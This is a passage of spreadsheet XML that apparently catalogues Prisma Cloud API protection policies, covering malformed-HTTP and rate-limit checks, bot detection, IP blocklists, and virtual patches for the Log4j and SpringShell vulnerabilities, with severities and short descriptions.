      <c r="AK3382" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3383">
      <c r="A3383" t="inlineStr"/>
      <c r="B3383" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3383" s="2" t="inlineStr"/>
      <c r="D3383" t="inlineStr"/>
      <c r="E3383" t="inlineStr"/>
      <c r="F3383" t="inlineStr"/>
      <c r="G3383" t="b">
        <v>1</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3383" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3383" t="inlineStr">
        <is>
          <t>Malformed HTTP traffic detected</t>
        </is>
      </c>
      <c r="L3383" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3383" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3383" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3383" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3383" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3383" t="inlineStr"/>
      <c r="R3383" t="inlineStr"/>
      <c r="S3383" t="inlineStr"/>
      <c r="T3383" t="b">
        <v>0</v>
      </c>
      <c r="U3383" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3383" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3383" t="inlineStr">
        <is>
          <t>The policy is designed to ensure the integrity of HTTP requests by detecting and reporting any instances of malformed requests. These malformed requests may include anomalies such as HTTP GET requests with a body, or HTTP POST requests lacking a Content-Length header.</t>
        </is>
      </c>
      <c r="X338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3" t="inlineStr"/>
      <c r="Z3383" t="inlineStr"/>
      <c r="AA3383" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3383" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3383" t="inlineStr"/>
      <c r="AD3383" t="b">
        <v>1</v>
      </c>
      <c r="AE3383" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3383" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
          <t>9ac1275c-6dc8-4316-923f-2fb572ee2bdc</t>
        </is>
      </c>
      <c r="AI3383" t="inlineStr"/>
      <c r="AJ3383" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3383" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3384">
      <c r="A3384" t="inlineStr"/>
      <c r="B3384" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3384" s="2" t="inlineStr"/>
      <c r="D3384" t="inlineStr"/>
      <c r="E3384" t="inlineStr"/>
      <c r="F3384" t="inlineStr"/>
      <c r="G3384" t="b">
        <v>1</v>
      </c>
      <c r="H33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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3384" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3384" t="inlineStr">
        <is>
          <t>The client exceeded the rate limitation threshold for HTTP requests.</t>
        </is>
      </c>
      <c r="L3384" t="inlineStr">
        <is>
          <t>NETWORK_ANOMALY</t>
        </is>
      </c>
      <c r="M3384" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3384" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3384" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3384" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3384" t="inlineStr"/>
      <c r="R3384" t="inlineStr"/>
      <c r="S3384" t="inlineStr"/>
      <c r="T3384" t="b">
        <v>0</v>
      </c>
      <c r="U3384" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3384" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3384" t="inlineStr">
        <is>
          <t>The policy limits the rate of HTTP requests sent to endpoints based on two configurable request rates:
- Burst Rate - Average rate of requests per second calculated over a 5 seconds period
- Average Rate - Average rate of requests per second calculated over a 120 seconds period
Users are able to specify match conditions for qualifying requests to be included in the count based on HTTP methods, File Extensions or HTTP response codes.</t>
        </is>
      </c>
      <c r="X338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4" t="inlineStr"/>
      <c r="Z3384" t="inlineStr"/>
      <c r="AA3384" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3384" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3384" t="inlineStr"/>
      <c r="AD3384" t="b">
        <v>1</v>
      </c>
      <c r="AE3384" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3384" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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4" t="inlineStr">
        <is>
          <t>4b4b3b7e-38f5-4f85-b7f4-26d0ea85d538</t>
        </is>
      </c>
      <c r="AI3384" t="inlineStr"/>
      <c r="AJ3384" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3384" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3385">
      <c r="A3385" t="inlineStr"/>
      <c r="B3385" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3385" s="2" t="inlineStr"/>
      <c r="D3385" t="inlineStr"/>
      <c r="E3385" t="inlineStr"/>
      <c r="F3385" t="inlineStr"/>
      <c r="G3385" t="b">
        <v>1</v>
      </c>
      <c r="H338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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3385" t="inlineStr">
        <is>
          <t>sensitive_data_exposure_api</t>
        </is>
      </c>
      <c r="K3385" t="inlineStr">
        <is>
          <t>Sensitive data sent via API endpoint exposed to internet without authentication</t>
        </is>
      </c>
      <c r="L3385" t="inlineStr">
        <is>
          <t>DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M3385" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3385" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3385" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3385" t="inlineStr">
        <is>
          <t>sensitive_data_exposure</t>
        </is>
      </c>
      <c r="Q3385" t="inlineStr"/>
      <c r="R3385" t="inlineStr"/>
      <c r="S3385" t="inlineStr"/>
      <c r="T3385" t="b">
        <v>0</v>
      </c>
      <c r="U3385" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3385" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3385" t="inlineStr">
        <is>
          <t>This policy identifies API transactions involving sensitive data through internet-exposed APIs where no authentication was established</t>
        </is>
      </c>
      <c r="X3385" t="inlineStr">
        <is>
          <t>Authentication should be implemented to ensure that only authorized users or systems can access the API endpoint. Robust authentication mechanisms such as API keys, OAuth, or JWT tokens should be utilized to verify credentials or tokens before granting access to sensitive data.</t>
        </is>
      </c>
      <c r="Y3385" t="inlineStr"/>
      <c r="Z3385" t="inlineStr"/>
      <c r="AA3385" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3385" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3385" t="inlineStr"/>
      <c r="AD3385" t="b">
        <v>1</v>
      </c>
      <c r="AE3385" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3385" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG338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5" t="inlineStr">
        <is>
          <t>b4d40c45-11a4-4c49-99f1-57d8ca01d007</t>
        </is>
      </c>
      <c r="AI3385" t="inlineStr"/>
      <c r="AJ3385" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3385" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3386">
      <c r="A3386" t="inlineStr"/>
      <c r="B3386" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3386" s="2" t="inlineStr"/>
      <c r="D3386" t="inlineStr"/>
      <c r="E3386" t="inlineStr"/>
      <c r="F3386" t="inlineStr"/>
      <c r="G3386" t="b">
        <v>1</v>
      </c>
      <c r="H338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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3386" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3386" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-45046 - Apache Log4j2 &lt; 2.16.0) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3386" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3386" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3386" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3386" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3386" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3386" t="inlineStr"/>
      <c r="R3386" t="inlineStr"/>
      <c r="S3386" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3386" t="b">
        <v>0</v>
      </c>
      <c r="U3386" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3386" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3386" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup or a Thread Context Map pattern to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.</t>
        </is>
      </c>
      <c r="X338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6" t="inlineStr"/>
      <c r="Z3386" t="inlineStr"/>
      <c r="AA3386" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3386" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3386" t="inlineStr"/>
      <c r="AD3386" t="b">
        <v>1</v>
      </c>
      <c r="AE3386" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3386" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG338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6" t="inlineStr">
        <is>
          <t>bbd32e6f-5564-44de-aa3b-4fa3c4f02f99</t>
        </is>
      </c>
      <c r="AI3386" t="inlineStr"/>
      <c r="AJ3386" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3386" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3387">
      <c r="A3387" t="inlineStr"/>
      <c r="B3387" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3387" s="2" t="inlineStr"/>
      <c r="D3387" t="inlineStr"/>
      <c r="E3387" t="inlineStr"/>
      <c r="F3387" t="inlineStr"/>
      <c r="G3387" t="b">
        <v>1</v>
      </c>
      <c r="H338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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3387" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3387" t="inlineStr">
        <is>
          <t>Web client did not pass Google's reCAPTCHA verification</t>
        </is>
      </c>
      <c r="L3387" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3387" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3387" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3387" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3387" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3387" t="inlineStr"/>
      <c r="R3387" t="inlineStr"/>
      <c r="S3387" t="inlineStr"/>
      <c r="T3387" t="b">
        <v>0</v>
      </c>
      <c r="U3387" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3387" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3387" t="inlineStr">
        <is>
          <t>This policy alerts on web clients that did not pass Google's reCAPTCHA verificaiton. Prisma Cloud users can enable Google’s reCAPTCHA v2 integration by specifying the site key, secret key and challenge type. Based on the user’s preference and settings, Prisma Cloud will serve a reCAPTCHA challenge at the beginning of each new session, or when a request is suspected of being sent by an unknown bot.</t>
        </is>
      </c>
      <c r="X338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7" t="inlineStr"/>
      <c r="Z3387" t="inlineStr"/>
      <c r="AA3387" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3387" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3387" t="inlineStr"/>
      <c r="AD3387" t="b">
        <v>1</v>
      </c>
      <c r="AE3387" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3387" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG338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7" t="inlineStr">
        <is>
          <t>84a3f8ad-7bce-492e-ae26-d5cba212f4c8</t>
        </is>
      </c>
      <c r="AI3387" t="inlineStr"/>
      <c r="AJ3387" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3387" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3388">
      <c r="A3388" t="inlineStr"/>
      <c r="B3388" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3388" s="2" t="inlineStr"/>
      <c r="D3388" t="inlineStr"/>
      <c r="E3388" t="inlineStr"/>
      <c r="F3388" t="inlineStr"/>
      <c r="G3388" t="b">
        <v>1</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3388" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3388" t="inlineStr">
        <is>
          <t>User-defined bot detected</t>
        </is>
      </c>
      <c r="L3388" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3388" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3388" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3388" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3388" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3388" t="inlineStr"/>
      <c r="R3388" t="inlineStr"/>
      <c r="S3388" t="inlineStr"/>
      <c r="T3388" t="b">
        <v>0</v>
      </c>
      <c r="U3388" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3388" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3388" t="inlineStr">
        <is>
          <t>Prisma Cloud users can create custom signatures to be used based on HTTP headers and source IPs. User-defined signatures are useful for tracking customer specific bots, self-developed automation clients and traffic that appears suspicious.</t>
        </is>
      </c>
      <c r="X338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8" t="inlineStr"/>
      <c r="Z3388" t="inlineStr"/>
      <c r="AA3388" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3388" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3388" t="inlineStr"/>
      <c r="AD3388" t="b">
        <v>1</v>
      </c>
      <c r="AE3388" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3388" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>d0073b00-e484-4710-9d14-71f36865d07b</t>
        </is>
      </c>
      <c r="AI3388" t="inlineStr"/>
      <c r="AJ3388" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3388" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3389">
      <c r="A3389" t="inlineStr"/>
      <c r="B3389" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3389" s="2" t="inlineStr"/>
      <c r="D3389" t="inlineStr"/>
      <c r="E3389" t="inlineStr"/>
      <c r="F3389" t="inlineStr"/>
      <c r="G3389" t="b">
        <v>1</v>
      </c>
      <c r="H338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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3389" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3389" t="inlineStr">
        <is>
          <t>Web client did not respond to javascript client fingerprinting check within a reasonable timeframe, resulting in a timeout</t>
        </is>
      </c>
      <c r="L3389" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3389" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3389" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3389" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3389" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3389" t="inlineStr"/>
      <c r="R3389" t="inlineStr"/>
      <c r="S3389" t="inlineStr"/>
      <c r="T3389" t="b">
        <v>0</v>
      </c>
      <c r="U3389" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3389" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3389" t="inlineStr">
        <is>
          <t>This policy evaluates whether web clientst respond to the JavaScript client fingerprinting check within a reasonable timeframe. The policy serves to prevent abuse, unauthorized access, and potential disruptions caused by bots or automated scripts.</t>
        </is>
      </c>
      <c r="X338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89" t="inlineStr"/>
      <c r="Z3389" t="inlineStr"/>
      <c r="AA3389" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3389" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3389" t="inlineStr"/>
      <c r="AD3389" t="b">
        <v>1</v>
      </c>
      <c r="AE3389" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3389" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG338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89" t="inlineStr">
        <is>
          <t>f49c752b-f174-4a93-ae0a-b29a44043665</t>
        </is>
      </c>
      <c r="AI3389" t="inlineStr"/>
      <c r="AJ3389" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3389" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3390">
      <c r="A3390" t="inlineStr"/>
      <c r="B3390" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3390" s="2" t="inlineStr"/>
      <c r="D3390" t="inlineStr"/>
      <c r="E3390" t="inlineStr"/>
      <c r="F3390" t="inlineStr"/>
      <c r="G3390" t="b">
        <v>1</v>
      </c>
      <c r="H339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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3390" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3390" t="inlineStr">
        <is>
          <t>Access attempt has been detected in HTTP traffic from an IP address that is either listed in a blocklist or not included in the list of allowed IPs</t>
        </is>
      </c>
      <c r="L3390" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3390" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3390" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3390" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3390" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3390" t="inlineStr"/>
      <c r="R3390" t="inlineStr"/>
      <c r="S3390" t="inlineStr"/>
      <c r="T3390" t="b">
        <v>0</v>
      </c>
      <c r="U3390" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3390" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3390" t="inlineStr">
        <is>
          <t>Prisma Cloud allows for control over how applications and end-users communicate with  web application.
IP-based  lists can be specified in:
- Blocklisted Inbound Source IP ranges - for acting on requests originating from the specified IP ranges.
- Allowed Inbound Source IP ranges - for acting on requests originating from requests not originating from the specified IP ranges.</t>
        </is>
      </c>
      <c r="X339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0" t="inlineStr"/>
      <c r="Z3390" t="inlineStr"/>
      <c r="AA3390" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3390" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3390" t="inlineStr"/>
      <c r="AD3390" t="b">
        <v>1</v>
      </c>
      <c r="AE3390" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3390" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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0" t="inlineStr">
        <is>
          <t>6747fb27-61eb-4655-93d1-ea52533ac139</t>
        </is>
      </c>
      <c r="AI3390" t="inlineStr"/>
      <c r="AJ3390" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3390" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3391">
      <c r="A3391" t="inlineStr"/>
      <c r="B3391" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3391" s="2" t="inlineStr"/>
      <c r="D3391" t="inlineStr"/>
      <c r="E3391" t="inlineStr"/>
      <c r="F3391" t="inlineStr"/>
      <c r="G3391" t="b">
        <v>1</v>
      </c>
      <c r="H339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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3391" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3391" t="inlineStr">
        <is>
          <t>An attempt to exploit known vulnerabilities observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3391" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3391" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3391" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3391" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3391" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3391" t="inlineStr"/>
      <c r="R3391" t="inlineStr"/>
      <c r="S3391" t="inlineStr"/>
      <c r="T3391" t="b">
        <v>0</v>
      </c>
      <c r="U3391" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3391" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3391" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of virtually patching them or identifying targeted exploits.</t>
        </is>
      </c>
      <c r="X339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1" t="inlineStr"/>
      <c r="Z3391" t="inlineStr"/>
      <c r="AA3391" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3391" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3391" t="inlineStr"/>
      <c r="AD3391" t="b">
        <v>1</v>
      </c>
      <c r="AE3391" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3391" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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1" t="inlineStr">
        <is>
          <t>1ecf17be-e0d9-43f6-b0dd-5909355ce663</t>
        </is>
      </c>
      <c r="AI3391" t="inlineStr"/>
      <c r="AJ3391" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3391" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3392">
      <c r="A3392" t="inlineStr"/>
      <c r="B3392" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3392" s="2" t="inlineStr"/>
      <c r="D3392" t="inlineStr"/>
      <c r="E3392" t="inlineStr"/>
      <c r="F3392" t="inlineStr"/>
      <c r="G3392" t="b">
        <v>1</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3392" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3392" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-22963, CVE-2022-22965 - SpringShell) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3392" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3392" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3392" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3392" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3392" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3392" t="inlineStr"/>
      <c r="R3392" t="inlineStr"/>
      <c r="S3392" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3392" t="b">
        <v>0</v>
      </c>
      <c r="U3392" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3392" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3392" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
CVE-2022-22963 - In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
CVE-2022-22965- A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.</t>
        </is>
      </c>
      <c r="X339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2" t="inlineStr"/>
      <c r="Z3392" t="inlineStr"/>
      <c r="AA3392" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3392" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3392" t="inlineStr"/>
      <c r="AD3392" t="b">
        <v>1</v>
      </c>
      <c r="AE3392" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3392" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>0c1a9999-9266-45af-9776-a84e44652e71</t>
        </is>
      </c>
      <c r="AI3392" t="inlineStr"/>
      <c r="AJ3392" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3392" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3393">
      <c r="A3393" t="inlineStr"/>
      <c r="B3393" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3393" s="2" t="inlineStr"/>
      <c r="D3393" t="inlineStr"/>
      <c r="E3393" t="inlineStr"/>
      <c r="F3393" t="inlineStr"/>
      <c r="G3393" t="b">
        <v>1</v>
      </c>
      <c r="H339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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3393" t="inlineStr">
        <is>
          <t>vulnerability_scanning_api</t>
        </is>
      </c>
      <c r="K3393" t="inlineStr">
        <is>
          <t>Attack tool signature detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3393" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3393" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3393" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
